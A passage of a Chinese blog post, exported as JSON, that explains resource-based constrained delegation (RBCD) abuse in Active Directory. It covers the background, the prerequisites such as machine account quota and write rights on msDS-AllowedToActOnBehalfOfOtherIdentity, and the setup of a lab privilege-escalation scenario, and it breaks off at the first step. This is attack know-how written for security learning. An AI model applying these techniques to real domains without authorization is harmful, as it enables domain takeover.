{"id":1002,"date":"2023-09-24T15:12:00","date_gmt":"2023-09-24T07:12:00","guid":{"rendered":"http:\/\/weizn.net\/?p=1002"},"modified":"2026-05-08T16:53:44","modified_gmt":"2026-05-08T08:53:44","slug":"1002","status":"publish","type":"post","link":"http:\/\/weizn.net\/?p=1002","title":{"rendered":"\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e\uff08RBCD\uff09\u653b\u51fb"},"content":{"rendered":"<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_17 counter-hierarchy\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\">\u76ee\u5f55<\/p>\n<span class=\"ez-toc-title-toggle\"><a class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" style=\"display: none;\"><i class=\"ez-toc-glyphicon ez-toc-icon-toggle\"><\/i><\/a><\/span><\/div>\n<nav><ul class=\"ez-toc-list ez-toc-list-level-1\"><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-1\" href=\"http:\/\/weizn.net\/?p=1002\/#%E4%B8%80%E3%80%81%E8%83%8C%E6%99%AF%E7%9F%A5%E8%AF%86\" title=\"\u4e00\u3001\u80cc\u666f\u77e5\u8bc6\">\u4e00\u3001\u80cc\u666f\u77e5\u8bc6<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-2\" href=\"http:\/\/weizn.net\/?p=1002\/#1%E3%80%81%E5%9F%BA%E4%BA%8E%E8%B5%84%E6%BA%90%E7%9A%84%E7%BA%A6%E6%9D%9F%E6%80%A7%E5%A7%94%E6%B4%BE%E7%9A%84%E4%BC%98%E5%8A%BF\" title=\"1\u3001\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u6027\u59d4\u6d3e\u7684\u4f18\u52bf\">1\u3001\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u6027\u59d4\u6d3e\u7684\u4f18\u52bf<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-3\" href=\"http:\/\/weizn.net\/?p=1002\/#2%E3%80%81%E7%BA%A6%E6%9D%9F%E6%80%A7%E5%A7%94%E6%B4%BE%E5%92%8C%E5%9F%BA%E4%BA%8E%E8%B5%84%E6%BA%90%E7%9A%84%E7%BA%A6%E6%9D%9F%E6%80%A7%E5%A7%94%E6%B4%BE%E9%85%8D%E7%BD%AE%E7%9A%84%E5%B7%AE%E5%88%AB\" title=\"2\u3001\u7ea6\u675f\u6027\u59d4\u6d3e\u548c\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u6027\u59d4\u6d3e\u914d\u7f6e\u7684\u5dee\u522b\">2\u3001\u7ea6\u675f\u6027\u59d4\u6d3e\u548c\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u6027\u59d4\u6d3e\u914d\u7f6e\u7684\u5dee\u522b<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-4\" href=\"http:\/\/weizn.net\/?p=1002\/#%E4%BA%8C%E3%80%81%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6\" title=\"\u4e8c\u3001\u5229\u7528\u6761\u4ef6\">\u4e8c\u3001\u5229\u7528\u6761\u4ef6<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-2\"><a class=\"ez-toc-link ez-toc-heading-5\" href=\"http:\/\/weizn.net\/?p=1002\/#%E4%B8%89%E3%80%81%E5%88%A9%E7%94%A8%E5%9C%BA%E6%99%AF\" title=\"\u4e09\u3001\u5229\u7528\u573a\u666f\">\u4e09\u3001\u5229\u7528\u573a\u666f<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-6\" href=\"http:\/\/weizn.net\/?p=1002\/#1%E3%80%81%E6%9C%AC%E5%9C%B0%E5%9F%9F%E7%94%A8%E6%88%B7%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87\" title=\"1\u3001\u672c\u5730\u57df\u7528\u6237\u6743\u9650\u63d0\u5347\">1\u3001\u672c\u5730\u57df\u7528\u6237\u6743\u9650\u63d0\u5347<\/a><ul class=\"ez-toc-list-level-4\"><li class=\"ez-toc-heading-level-4\"><a class=\"ez-toc-link ez-toc-heading-7\" href=\"http:\/\/weizn.net\/?p=1002\/#%EF%BC%881%EF%BC%89%E7%A1%AE%E5%AE%9A%E5%8A%A0%E5%9F%9F%E8%B4%A6%E5%8F%B7\" title=\"\uff081\uff09\u786e\u5b9a\u52a0\u57df\u8d26\u53f7\">\uff081\uff09\u786e\u5b9a\u52a0\u57df\u8d26\u53f7<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-4\"><a class=\"ez-toc-link ez-toc-heading-8\" href=\"http:\/\/weizn.net\/?p=1002\/#%EF%BC%882%EF%BC%89%E6%B7%BB%E5%8A%A0%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%B4%A6%E5%8F%B7\" title=\"\uff082\uff09\u6dfb\u52a0\u8ba1\u7b97\u673a\u8d26\u53f7\">\uff082\uff09\u6dfb\u52a0\u8ba1\u7b97\u673a\u8d26\u53f7<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-4\"><a class=\"ez-toc-link ez-toc-heading-9\" href=\"http:\/\/weizn.net\/?p=1002\/#%EF%BC%883%EF%BC%89%E6%9F%A5%E8%AF%A2%E6%96%B0%E5%88%9B%E5%BB%BA%E7%9A%84%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%B4%A6%E5%8F%B7SID\" title=\"\uff083\uff09\u67e5\u8be2\u65b0\u521b\u5efa\u7684\u8ba1\u7b97\u673a\u8d26\u53f7SID\">\uff083\uff09\u67e5\u8be2\u65b0\u521b\u5efa\u7684\u8ba1\u7b97\u673a\u8d26\u53f7SID<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-4\"><a class=\"ez-toc-link ez-toc-heading-10\" href=\"http:\/\/weizn.net\/?p=1002\/#%EF%BC%884%EF%BC%89%E8%AE%BE%E7%BD%AE%E5%A7%94%E6%B4%BE%E5%85%B3%E7%B3%BB\" title=\"\uff084\uff09\u8bbe\u7f6e\u59d4\u6d3e\u5173\u7cfb\">\uff084\uff09\u8bbe\u7f6e\u59d4\u6d3e\u5173\u7cfb<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-4\"><a class=\"ez-toc-link ez-toc-heading-11\" href=\"http:\/\/weizn.net\/?p=1002\/#%EF%BC%885%EF%BC%89%E5%A7%94%E6%B4%BE%E7%89%B9%E6%9D%83%E7%94%A8%E6%88%B7%E5%B9%B6%E8%8E%B7%E5%8F%96%E7%A5%A8%E6%8D%AE\" title=\"\uff085\uff09\u59d4\u6d3e\u7279\u6743\u7528\u6237\u5e76\u83b7\u53d6\u7968\u636e\">\uff085\uff09\u59d4\u6d3e\u7279\u6743\u7528\u6237\u5e76\u83b7\u53d6\u7968\u636e<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-12\" href=\"http:\/\/weizn.net\/?p=1002\/#2%E3%80%81%E6%A8%AA%E5%90%91%E5%88%B0%E5%9F%9F%E5%86%85%E5%85%B6%E5%AE%83%E4%B8%BB%E6%9C%BA\" title=\"2\u3001\u6a2a\u5411\u5230\u57df\u5185\u5176\u5b83\u4e3b\u673a\">2\u3001\u6a2a\u5411\u5230\u57df\u5185\u5176\u5b83\u4e3b\u673a<\/a><ul class=\"ez-toc-list-level-4\"><li class=\"ez-toc-heading-level-4\"><a class=\"ez-toc-link ez-toc-heading-13\" href=\"http:\/\/weizn.net\/?p=1002\/#%EF%BC%881%EF%BC%89%E5%89%8D%E7%BD%AE%E5%B7%A5%E4%BD%9C%E6%B5%81%E7%A8%8B\" title=\"\uff081\uff09\u524d\u7f6e\u5de5\u4f5c\u6d41\u7a0b\">\uff081\uff09\u524d\u7f6e\u5de5\u4f5c\u6d41\u7a0b<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-4\"><a class=\"ez-toc-link ez-toc-heading-14\" href=\"http:\/\/weizn.net\/?p=1002\/#%EF%BC%882%EF%BC%89%E8%8E%B7%E5%8F%96%E5%8A%A0%E5%9F%9F%E8%B4%A6%E5%8F%B7%E7%9A%84TGT\" title=\"\uff082\uff09\u83b7\u53d6\u52a0\u57df\u8d26\u53f7\u7684TGT\">\uff082\uff09\u83b7\u53d6\u52a0\u57df\u8d26\u53f7\u7684TGT<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-4\"><a class=\"ez-toc-link ez-toc-heading-15\" href=\"http:\/\/weizn.net\/?p=1002\/#%EF%BC%883%EF%BC%89%E8%AE%BE%E7%BD%AE%E5%A7%94%E6%B4%BE%E5%85%B3%E7%B3%BB%E5%88%B0%E7%9B%AE%E6%A0%87%E8%B5%84%E6%BA%90\" title=\"\uff083\uff09\u8bbe\u7f6e\u59d4\u6d3e\u5173\u7cfb\u5230\u76ee\u6807\u8d44\u6e90\">\uff083\uff09\u8bbe\u7f6e\u59d4\u6d3e\u5173\u7cfb\u5230\u76ee\u6807\u8d44\u6e90<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-4\"><a class=\"ez-toc-link ez-toc-heading-16\" href=\"http:\/\/weizn.net\/?p=1002\/#%EF%BC%884%EF%BC%89%E5%A7%94%E6%B4%BE%E7%89%B9%E6%9D%83%E7%94%A8%E6%88%B7%E5%B9%B6%E8%8E%B7%E5%8F%96%E7%A5%A8%E6%8D%AE\" title=\"\uff084\uff09\u59d4\u6d3e\u7279\u6743\u7528\u6237\u5e76\u83b7\u53d6\u7968\u636e\">\uff084\uff09\u59d4\u6d3e\u7279\u6743\u7528\u6237\u5e76\u83b7\u53d6\u7968\u636e<\/a><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-17\" href=\"http:\/\/weizn.net\/?p=1002\/#3%E3%80%81%E5%BC%BA%E5%88%B6%E8%AE%A4%E8%AF%81%E5%A7%94%E6%B4%BE%E6%8E%A5%E7%AE%A1%E5%9F%9F%E6%8E%A7\" title=\"3\u3001\u5f3a\u5236\u8ba4\u8bc1+\u59d4\u6d3e\u63a5\u7ba1\u57df\u63a7\">3\u3001\u5f3a\u5236\u8ba4\u8bc1+\u59d4\u6d3e\u63a5\u7ba1\u57df\u63a7<\/a><ul class=\"ez-toc-list-level-4\"><li class=\"ez-toc-heading-level-4\"><a class=\"ez-toc-link ez-toc-heading-18\" href=\"http:\/\/weizn.net\/?p=1002\/#%EF%BC%881%EF%BC%89%E6%B7%BB%E5%8A%A0%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%B4%A6%E5%8F%B7\" title=\"\uff081\uff09\u6dfb\u52a0\u8ba1\u7b97\u673a\u8d26\u53f7\">\uff081\uff09\u6dfb\u52a0\u8ba1\u7b97\u673a\u8d26\u53f7<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-4\"><a class=\"ez-toc-link ez-toc-heading-19\" href=\"http:\/\/weizn.net\/?p=1002\/#%EF%BC%882%EF%BC%89%E4%B8%AD%E7%BB%A7%E5%88%B0ldap%E6%9C%8D%E5%8A%A1%E6%B7%BB%E5%8A%A0%E6%8C%87%E5%AE%9A%E8%AE%A1%E7%AE%97%E6%9C%BA%E8%B4%A6%E5%8F%B7%E5%88%B0%E5%9F%9F%E6%8E%A7%E7%9A%84%E5%A7%94%E6%B4%BE%E6%9D%83%E9%99%90\" title=\"\uff082\uff09\u4e2d\u7ee7\u5230ldap\u670d\u52a1\u6dfb\u52a0\u6307\u5b9a\u8ba1\u7b97\u673a\u8d26\u53f7\u5230\u57df\u63a7\u7684\u59d4\u6d3e\u6743\u9650\">\uff082\uff09\u4e2d\u7ee7\u5230ldap\u670d\u52a1\u6dfb\u52a0\u6307\u5b9a\u8ba1\u7b97\u673a\u8d26\u53f7\u5230\u57df\u63a7\u7684\u59d4\u6d3e\u6743\u9650<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-4\"><a class=\"ez-toc-link ez-toc-heading-20\" href=\"http:\/\/weizn.net\/?p=1002\/#%EF%BC%883%EF%BC%89%E7%94%B3%E8%AF%B7%E5%A7%94%E6%B4%BE%E7%89%B9%E6%9D%83%E8%B4%A6%E5%8F%B7%E5%88%B0%E5%9F%9F%E6%8E%A7%E6%9C%8D%E5%8A%A1%E7%9A%84ST%E7%A5%A8%E6%8D%AE\" title=\"\uff083\uff09\u7533\u8bf7\u59d4\u6d3e\u7279\u6743\u8d26\u53f7\u5230\u57df\u63a7\u670d\u52a1\u7684ST\u7968\u636e\">\uff083\uff09\u7533\u8bf7\u59d4\u6d3e\u7279\u6743\u8d26\u53f7\u5230\u57df\u63a7\u670d\u52a1\u7684ST\u7968\u636e<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-4\"><a class=\"ez-toc-link ez-toc-heading-21\" href=\"http:\/\/weizn.net\/?p=1002\/#%EF%BC%884%EF%BC%89%E4%BD%BF%E7%94%A8ST%E7%A5%A8%E6%8D%AE%E6%8E%A5%E7%AE%A1%E5%9F%9F%E6%8E%A7\" title=\"\uff084\uff09\u4f7f\u7528ST\u7968\u636e\u63a5\u7ba1\u57df\u63a7\">\uff084\uff09\u4f7f\u7528ST\u7968\u636e\u63a5\u7ba1\u57df\u63a7<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-4\"><a class=\"ez-toc-link ez-toc-heading-22\" href=\"http:\/\/weizn.net\/?p=1002\/#%EF%BC%885%EF%BC%89%E5%88%B6%E4%BD%9C%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE\" title=\"\uff085\uff09\u5236\u4f5c\u9ec4\u91d1\u7968\u636e\">\uff085\uff09\u5236\u4f5c\u9ec4\u91d1\u7968\u636e<\/a><\/li><\/ul><\/li><\/ul><\/li><\/ul><\/nav><\/div>\n<h2><span class=\"ez-toc-section\" id=\"%E4%B8%80%E3%80%81%E8%83%8C%E6%99%AF%E7%9F%A5%E8%AF%86\"><\/span>\u4e00\u3001\u80cc\u666f\u77e5\u8bc6<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e\u76f8\u6bd4\u4e8e\u975e\u7ea6\u675f\u59d4\u6d3e\u548c\u7ea6\u675f\u59d4\u6d3e\uff0c\u5728\u8bbe\u7f6e\u670d\u52a1\u8d26\u53f7\u548c\u8ba1\u7b97\u673a\u8d26\u53f7\u7684\u59d4\u6d3e\u6743\u9650\u7075\u6d3b\u6027\u66f4\u9ad8\uff0c\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e\u4e0d\u9700\u8981\u57df\u7ba1\u7406\u5458\u6743\u9650\u53bb\u8bbe\u7f6e\uff0c\u800c\u628a\u8bbe\u7f6e\u5c5e\u6027\u7684\u6743\u9650\u8d4b\u4e88\u7ed9\u4e86\u673a\u5668\u81ea\u8eab\u4ee5\u53ca\u52a0\u57df\u8d26\u53f7\u3002<\/p>\n<h3><span class=\"ez-toc-section\" id=\"1%E3%80%81%E5%9F%BA%E4%BA%8E%E8%B5%84%E6%BA%90%E7%9A%84%E7%BA%A6%E6%9D%9F%E6%80%A7%E5%A7%94%E6%B4%BE%E7%9A%84%E4%BC%98%E5%8A%BF\"><\/span>1\u3001\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u6027\u59d4\u6d3e\u7684\u4f18\u52bf<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<ul>\n<li>\u59d4\u6d3e\u7684\u6743\u9650\u6388\u4e88\u7ed9\u4e86\u62e5\u6709\u8d44\u6e90\u7684\u540e\u7aef(B)\uff0c\u800c\u4e0d\u518d\u662f\u524d\u7aef(A)<\/li>\n<li>\u7ea6\u675f\u6027\u59d4\u6d3e\u4e0d\u80fd\u8de8\u57df\u8fdb\u884c\u59d4\u6d3e\uff0c\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u6027\u59d4\u6d3e\u53ef\u4ee5\u8de8\u57df\u548c\u6797<\/li>\n<li>\u4e0d\u518d\u9700\u8981\u57df\u7ba1\u7406\u5458\u6743\u9650\u8bbe\u7f6e\u59d4\u6d3e\uff0c\u53ea\u9700\u62e5\u6709\u5728\u8ba1\u7b97\u673a\u5bf9\u8c61\u7f16\u8f91<code>msDS-AllowedToActOnBehalfofotherIdentity<\/code>\u5c5e\u6027\u7684\u6743\u9650\uff0c\u4e5f\u5c31\u662f\u5c06\u8ba1\u7b97\u673a\u52a0\u5165\u57df\u7684\u57df\u7528\u6237\u548c\u673a\u5668\u81ea\u8eab\u90fd\u62e5\u6709\u6743\u9650<\/li>\n<li>\u670d\u52a1\u8d26\u53f7\u6216\u8ba1\u7b97\u673a\u8d26\u53f7\u5728\u6267\u884c\u59d4\u6d3e\u4efb\u52a1\u65f6\uff0c\u53ea\u80fd\u83b7\u53d6\u5230\u7528\u6237\u7684ST\u7968\u636e\u8bbf\u95ee\u7279\u5b9a\u670d\u52a1\uff0c\u4e0d\u540c\u4e8e\u975e\u7ea6\u675f\u59d4\u6d3e\u53ef\u76f4\u63a5\u83b7\u53d6\u7528\u6237\u7684TGT\uff0c\u5b89\u5168\u6027\u4e0a\u6709\u8fdb\u4e00\u6b65\u63d0\u5347<\/li>\n<\/ul>\n<h3><span class=\"ez-toc-section\" id=\"2%E3%80%81%E7%BA%A6%E6%9D%9F%E6%80%A7%E5%A7%94%E6%B4%BE%E5%92%8C%E5%9F%BA%E4%BA%8E%E8%B5%84%E6%BA%90%E7%9A%84%E7%BA%A6%E6%9D%9F%E6%80%A7%E5%A7%94%E6%B4%BE%E9%85%8D%E7%BD%AE%E7%9A%84%E5%B7%AE%E5%88%AB\"><\/span>2\u3001\u7ea6\u675f\u6027\u59d4\u6d3e\u548c\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u6027\u59d4\u6d3e\u914d\u7f6e\u7684\u5dee\u522b<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<ul>\n<li>\u4f20\u7edf\u7684\u7ea6\u675f\u59d4\u6d3e\u662f\u6b63\u5411\u7684\uff0c\u901a\u8fc7\u4fee\u6539\u670d\u52a1A\u7684\u5c5e\u6027<code>msDS-AllowedToDelegateTo<\/code>\uff0c\u6dfb\u52a0\u670d\u52a1B\u7684SPN\uff0c\u8bbe\u7f6e\u7ea6\u675f\u59d4\u6d3e\u5bf9\u8c61 (\u670d\u52a1B) \uff0c\u670d\u52a1A\u4fbf\u53ef\u4ee5\u6a21\u62df\u7528\u6237\u5411\u57df\u63a7\u5236\u5668\u8bf7\u6c42\u8bbf\u95ee\u670d\u52a1B\u7684ST\u670d\u52a1\u7968\u636e<\/li>\n<li>\u800c\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e\u5219\u662f\u76f8\u53cd\u7684\uff0c\u901a\u8fc7\u4fee\u6539\u670d\u52a1B\u5c5e\u6027<code>msDS-AllowedToActOnBehalfofotherIdentity<\/code>\uff0c\u6dfb\u52a0\u670d\u52a1A\u7684SID\uff0c\u8fbe\u5230\u8ba9\u670d\u52a1A\u6a21\u62df\u7528\u6237\u8bbf\u95ee\u670d\u52a1B\u7684\u76ee\u7684<br \/>\n<img decoding=\"async\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2026\/05\/post-1002-69fd8d05a4f08.\" alt=\"\" \/><\/li>\n<\/ul>\n<hr \/>\n<h2><span class=\"ez-toc-section\" id=\"%E4%BA%8C%E3%80%81%E5%88%A9%E7%94%A8%E6%9D%A1%E4%BB%B6\"><\/span>\u4e8c\u3001\u5229\u7528\u6761\u4ef6<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e\u4e0d\u518d\u9700\u8981\u57df\u7ba1\u7406\u5458\u6743\u9650\u8bbe\u7f6e\u59d4\u6d3e\uff0c\u6240\u4ee5\u6211\u4eec\u9700\u8981\u62e5\u6709\u5728\u8ba1\u7b97\u673a\u5bf9\u8c61\u4e0a\u7f16\u8f91<code>msDS-AllowedToActOnBehalfOfOtherIdentity<\/code>\u5c5e\u6027\u7684\u6743\u9650\uff0c\u4e5f\u5c31\u662f\uff0c<strong>\u8ba1\u7b97\u673a\u5728\u52a0\u5165\u57df\u65f6\uff0c\u4f7f\u7528\u7684\u52a0\u57df\u7528\u6237\uff0c\u548c\u57df\u8ba1\u7b97\u673a\u8d26\u53f7\u81ea\u8eab\u662f\u62e5\u6709\u7f16\u8f91\u6743\u9650\u7684<\/strong>\u3002<\/p>\n<blockquote>\n<p>\u5728\u5927\u578b\u5185\u7f51\u73af\u5883\u5728\u5927\u578b\u5185\u7f51\u57df\u73af\u5883\u4e2d\uff0c\u5c06\u673a\u5668\u52a0\u5165\u5230\u57df\u73af\u5883\u4e2d\u4e00\u822c\u4e0d\u4f1a\u7528\u57df\u7ba1\u6743\u9650\uff0c\u800c\u662f\u7528\u4e00\u4e2a\u4e13\u95e8\u52a0\u57df\u7684\u57df\u7528\u6237\u53bb\u64cd\u4f5c\u3002\u90a3\u4e48\u5f53\u6211\u4eec\u62ff\u4e0b\u8be5\u57df\u7528\u6237\u7684\u8d26\u53f7\u5bc6\u7801\u65f6\uff0c\u5c31\u53ef\u4ee5\u628a\u901a\u8fc7\u8be5\u57df\u7528\u6237\u52a0\u5165\u5230\u57df\u91cc\u7684\u6240\u6709\u673a\u5668\u90fd\u62ff\u4e0b\u3002<\/p>\n<\/blockquote>\n<p>\u5229\u7528\u57fa\u4e8e\u8d44\u6e90\u7684\u7ea6\u675f\u59d4\u6d3e\u8fdb\u884c\u653b\u51fb\u7684\u524d\u63d0\u9700\u8981:<\/p>\n<ul>\n<li><strong>\u673a\u5668\u8d26\u6237<\/strong>\uff1a\u57df\u5185\u7528\u6237\u90fd\u6709\u4e00\u4e2a\u5c5e\u6027\u53eb\u505a<code>ms-ds-MachineAccountQuota<\/code>\uff0c\u5b83\u4ee3\u8868\u7684\u662f\u4f7f\u7528\u8be5\u57df\u7528\u6237\u80fd\u5c06\u591a\u5c11\u53f0\u8ba1\u7b97\u673a\u52a0\u5165\u5230\u57df\u7684\u4e2a\u6570\uff0c\u9ed8\u8ba4\u662f10\uff0c\u8fd9\u4ee3\u8868\u7740\u6211\u4eec\u5982\u679c\u62e5\u6709\u4e00\u4e2a\u666e\u901a\u57df\u7528\u6237\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u5229\u7528\u8fd9\u4e2a\u7528\u6237\u521b\u5efa\u65b0\u768410\u4e2a\u673a\u5668\u8d26\u6237\u3002\u673a\u5668\u8d26\u6237\u7528\u4e8e\u59d4\u6d3e\u57df\u5185\u7279\u6743\u8d26\u53f7\u3002<\/li>\n<\/ul>\n<blockquote>\n<p>\u4e3a\u4ec0\u4e48\u662f\u673a\u5668\u8d26\u6237\uff1f\u56e0\u4e3a\u653b\u51fb\u7684\u65f6\u5019\u4f1a\u5229\u7528\u5230<code>S4U2<\/code>\u534f\u8bae\uff0c\u800c\u5b83\u53ea\u9002\u7528\u4e8e\u5177\u6709<code>spn<\/code>\u7684\u8d26\u6237\uff0c\u666e\u901a\u8d26\u6237\u6ca1\u6709<code>spn<\/code>\uff0c\u800c\u673a\u5668\u8d26\u6237\u9ed8\u8ba4\u662f\u6ce8\u518c<code>RestrictedKrbHost\/domain<\/code>\u548c<code>HOST\/domain<\/code>\u8fd9\u4e24\u4e2aSPN\u7684\uff0c\u8fd9\u4e2aHOST\u7c7b\u578b\u7684\u670d\u52a1\u91cc\u9762\u5305\u542b\u4e86\u5f88\u591a\u5c0f\u7684\u670d\u52a1\u4f8b\u5982<code>cifs<\/code>\u3002\u5b83\u662f\u4e00\u4e9b\u670d\u52a1\u7684\u96c6\u5408\u4f53\u3002<\/p>\n<\/blockquote>\n<ul>\n<li><strong>\u4e00\u4e2a\u6709\u6743\u5229\u4fee\u6539<code>msDS-AllowedToActOnBehalfOfOtherIdentity<\/code>\u5c5e\u6027\u7684\u8d26\u6237<\/strong>\uff1a\u8ba1\u7b97\u673a\u5728\u52a0\u5165\u57df\u65f6\uff0c\u4f7f\u7528\u7684\u52a0\u57df\u7528\u6237\uff0c\u548c\u57df\u8ba1\u7b97\u673a\u8d26\u53f7\u81ea\u8eab\u662f\u62e5\u6709\u7f16\u8f91\u6743\u9650\u7684<\/li>\n<\/ul>\n<blockquote>\n<p>\u53ef\u4ee5\u67e5\u8be2\u57df\u5185\u8ba1\u7b97\u673a\u7684<code>mS-DS-CreatorSID<\/code>\u8fd9\u4e2a\u503c\u4ee3\u8868\u7684\u662f\u5c06\u8ba1\u7b97\u673a\u52a0\u5165\u5230\u57df\u5185\u7684\u7528\u6237\uff0c\u5b83\u662f\u5177\u6709\u4fee\u6539<code>msDS-AllowedToActOnBehalfOfOtherIdentity<\/code>\u7684\u6743\u9650\u7684\uff0c\u5982\u679c\u6211\u4eec\u53ef\u4ee5\u62ff\u5230\u8fd9\u4e2a\u7528\u6237\u7684\u51ed\u636e\uff0c\u5c31\u53ef\u4ee5\u63a7\u5236\u4f7f\u7528\u8fd9\u4e2a\u7528\u6237\u6dfb\u52a0\u5230\u57df\u5185\u7684\u6240\u6709\u7684\u7535\u8111\u3002<\/p>\n<\/blockquote>\n<ul>\n<li><strong>\u57df\u5185\u6709\u53ef\u88ab\u59d4\u6d3e\u7684\u7279\u6743\u7528\u6237<\/strong>\uff1a\u4f8b\u5982\u57df\u7ba1\u7528\u6237\uff0c\u9ed8\u8ba4\u60c5\u51b5\u4e0b\u662f\u5177\u5907\u88ab\u59d4\u6d3e\u6743\u9650\uff0c\u5982\u679c\u7279\u6743\u7528\u6237\u5747\u88ab\u53d6\u6d88\u53ef\u88ab\u59d4\u6d3e\u6743\u9650\uff0c\u5219\u59d4\u6d3e\u653b\u51fb\u5c06\u96be\u4ee5\u8fbe\u6210\u57df\u5185\u63d0\u6743\u6548\u679c\u3002<\/li>\n<\/ul>\n<h2><span class=\"ez-toc-section\" id=\"%E4%B8%89%E3%80%81%E5%88%A9%E7%94%A8%E5%9C%BA%E6%99%AF\"><\/span>\u4e09\u3001\u5229\u7528\u573a\u666f<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<h3><span class=\"ez-toc-section\" id=\"1%E3%80%81%E6%9C%AC%E5%9C%B0%E5%9F%9F%E7%94%A8%E6%88%B7%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87\"><\/span>1\u3001\u672c\u5730\u57df\u7528\u6237\u6743\u9650\u63d0\u5347<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<blockquote>\n<ul>\n<li>\u5047\u8bbe\u4e00\u4e2a\u573a\u666f\uff0c\u653b\u51fb\u8005\u5728\u53d6\u5f97\u57df\u5185\u4e00\u4e2a\u8ba1\u7b97\u673a\u6743\u9650\u540e\uff0c\u65e0\u6cd5\u83b7\u53d6\u672c\u5730\u7ba1\u7406\u5458\u6743\u9650\uff0c\u5219\u53ef\u901a\u8fc7\u59d4\u6d3e\u57df\u5185\u7279\u6743\u8d26\u6237\u5230\u672c\u673a\uff0c\u4ece\u800c\u83b7\u53d6\u7279\u6743\u8d26\u6237\u7684ST\u7968\u636e\u5b9e\u73b0\u672c\u673a\u63d0\u6743<\/li>\n<li>\u7531\u4e8e\u5728\u4e00\u4e9b\u57df\u73af\u5883\u4e2d\uff0cIT\u4eba\u5458\u4e60\u60ef\u4f7f\u7528\u7528\u6237\u7684\u57df\u8d26\u53f7\u7ed9\u7528\u6237\u8ba1\u7b97\u673a\u52a0\u57df\uff0c\u800c\u4e0d\u662f\u4f7f\u7528\u7edf\u4e00\u7684\u52a0\u57df\u8d26\u53f7\uff0c\u8fd9\u5c31\u4f7f\u5f97\u7528\u6237\u53ef\u4ee5\u81ea\u5df1\u7ed9\u81ea\u5df1\u8ba1\u7b97\u673a\u8bbe\u7f6e<code>msDS-AllowedToActOnBehalfOfOtherIdentity<\/code>\u5c5e\u6027<\/li>\n<\/ul>\n<\/blockquote>\n<table>\n<thead>\n<tr>\n<th><strong>\u6d4b\u8bd5\u73af\u5883\uff1a<\/strong><\/th>\n<th>\u4e3b\u673a\u540d<\/th>\n<th>\u4e3b\u673aIP<\/th>\n<th>\u4e3b\u673a\u8d26\u6237<\/th>\n<th>\u4e3b\u673a\u7c7b\u578b<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>dc-main-1.qiuqiu.com<\/td>\n<td>10.10.10.10<\/td>\n<td>qiuqiu.com\\domain_admin<\/td>\n<td>DC<\/td>\n<\/tr>\n<tr>\n<td>user1.qiuqiu.com<\/td>\n<td>10.100.0.6<\/td>\n<td>qiuqiu.com\\yefan<\/td>\n<td>\u666e\u901a\u57df\u5185\u673a\u5668\uff0c\u88ab\u653b\u51fb\u8005\u63a7\u5236<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h4><span class=\"ez-toc-section\" id=\"%EF%BC%881%EF%BC%89%E7%A1%AE%E5%AE%9A%E5%8A%A0%E5%9F%9F%E8%B4%A6%E5%8F%B7\"><\/span>\uff081\uff09\u786e\u5b9a\u52a0\u57df\u8d26\u53f7<span 